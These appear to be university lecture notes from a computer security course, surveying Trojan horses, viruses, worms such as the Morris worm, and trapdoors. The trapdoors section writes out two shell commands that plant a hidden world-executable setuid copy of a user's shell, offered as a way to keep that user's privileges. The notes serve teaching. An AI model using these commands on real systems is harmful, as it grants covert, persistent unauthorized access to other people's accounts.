Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security
Malicious Code
(1) Kinds of Malicious Code
v Trojan horse
v Virus
v Logic bomb, time bomb
v trapdoor, backdoor
v Worm
(2) Trojan Horse
Trojan Horses: a piece of malicious code that, in addition to its primary effect, has a second, non-obvious malicious effect.
v ls Trojan horse.
Ø If somebody visits your directory, is it possible to trick the user into running a Trojan horse program?
Ø If “.” is at the beginning of the victim’s PATH environment variable.
v Ken Thompson's Famous Trojan Horses
Ø "Reflection on Trusting Trust", Turning Award Speech.
Ø Goal: add a Trojan horse to login program, so that one can use a special password to log into the system. However, the Trojan horse should be difficult to detect and fix.
Ø Approach 1: Change login binary
§ This is easy to fix, just recompile it from login.c.
§ How about also change login.c? This is easy to detect if somebody reads the code. Q: how to make it more difficult to detect?
Ø Approach 2: Change compiler.c for login.c, and change login.c back to the normal. When the compiler compiles login.c, it automatically adds the Trojan horses to login binary.
§ What if somebody reads compiler.c? The Trojan horse in compiler.c can be detected. They can get another copy of compiler.c, and compile this new (and clean) compiler.c.
Ø Approach 3: Change the complier.c, such that a Trojan horse will be added to the binary if compiler.c and login.c are compiled. After we get the binary of compiler, we change compiler.c back to the normal.
§ The Trojan horse is already built into the binary of compiler.
§ Unless somebody looks at the compiler binary, the Trojan horse is difficult to detect. None of the source files contain any Trojan horse; Trojan horses are added by the compiler.
§ To remove the Trojan horse, one has to change the compiler program.
(2) Virus
v Must be activated by being executed. There are various ways to get activated
Ø Running an affected program
Ø Attachment (Melissa and Love bug)(Macro virus)
Ø Reading email (Bubbleboy virus)
Ø Appended Viruses
Ø Viruses that surround a program
Ø Boot Sector Viruses
v Macro Viruses
Ø A sequence of instructions that is interpreted, rather than executed directly
Ø Melissa virus
v Solutions
Ø No general cure for viruses
Ø Virus checkers are effective against known viruses only
v Truths and Misconceptions about viruses
Ø Viruses can infect systems other than PCs/MS-DOS/Windows
Ø Q: why not many viruses exist in Unix?
Ø Viruses can appear in data files: Microsoft Word Macro virus
(3) Worms
v History of the Internet Worm
Ø Nov. 2 1988, Robert T. Morris Jr.
Ø His father Robert T. Morris Sr. (in NSA) and Ken Thompson wrote a paper about network security in 1979.
Ø Flaw in worm: fail to check the existence of another copy of the worm.
v What made worm a successful attack:
Ø Difference from virus: propagate via networks
Ø Bug in fingerd: buffer overflow
Ø Backdoor in sendmail: DEBUG mode
Ø Took advantage of a mechanism used to simplify resource sharing
Ø Weak passwords: password guessing
§ Worm carries a short list of common passwords (432 passwords): e.g. "guest", "passwords", "aaa", "help", "coffee", "coke", etc.
§ Use the system dictionary if the short list fails
Ø Disguise:
§ remove all the traces from disks
§ save all files in memory, encrypted
§ change its process name periodically
§
v More Malicious Code: Code Red
Ø Middle of 2001
Ø Using Microsoft's Internet Information Server (IIS)
Ø Using buffer overflows
(4) Trapdoors
v Example of trapdoors
Ø Special account to avoid password
Ø Special sequence to avoid access control
Ø Worm: sendmail DEBUG mode: allow to run a program
v Another example: What is a fast way to gain somebody's full privilege forever when he/she leaves the computer for a short period of time?
Ø % cp /bin/sh /tmp/.xxsh
Ø % chmod 4777 /tmp/.xxsh
v Causes of trapdoors:
Ø Forget to remove
Ø Intentionally leave them in the program for testing
Ø Intentionally leave them for maintenance
Ø Intentionally leave them as a covert means of access to the component
Wenliang Du Malicious Code: Page 1 of 3 4/2/2005